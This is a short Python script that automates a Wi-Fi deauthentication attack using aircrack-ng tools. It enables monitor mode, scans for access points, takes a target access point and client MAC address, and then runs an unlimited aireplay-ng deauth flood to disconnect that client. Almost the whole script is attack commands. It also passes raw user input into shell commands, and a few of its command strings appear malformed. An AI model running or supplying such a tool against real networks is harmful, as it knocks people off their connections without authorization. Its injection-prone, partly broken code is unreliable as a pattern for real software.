#!/bin/python3
import os
import subprocess
os.system("iwconfig")
interface=input("\n\nInterface?\n")
os.system("sudo airmon-ng start "+interface)
#subprocess.run(["sudo" , "airodump-ng", interface ], timeout=1)
interface=interface+"mon"
os.system("sudo timeout -k 10 9s airodump-ng "+interface+" < /dev/null")
AP_mac=input("AP MAC?\n")
channel=input("\nTarget AP channel?")
os.system("sudo airmon-ng start "+interface+""+channel)
#subprocess.run(["sudo" , "airodump-ng", "--bssid", AP_mac, interface ], timeout=10)
os.system("sudo timeout -k 20 15s airodump-ng --bssid "+AP_mac+" "+interface+" < /dev/null")
client_mac=input("Client Mac\n")
os.system("sudo avahi-daemon --kill")
os.system("sudo systemctl stop avahi-daemon.socket && sudo systemctl stop avahi-daemon.service") #there seems to be a problem with this service swithing wireless adapter channnel
os.system("sudo airmon-ng start "+interface+""+channel)
os.system("sudo aireplay-ng --deauth 0 -a "+AP_mac+" -c "+client_mac+" "+interface+" --ignore-negative-one")
os.system("sudo airmon-ng stop"+interface)
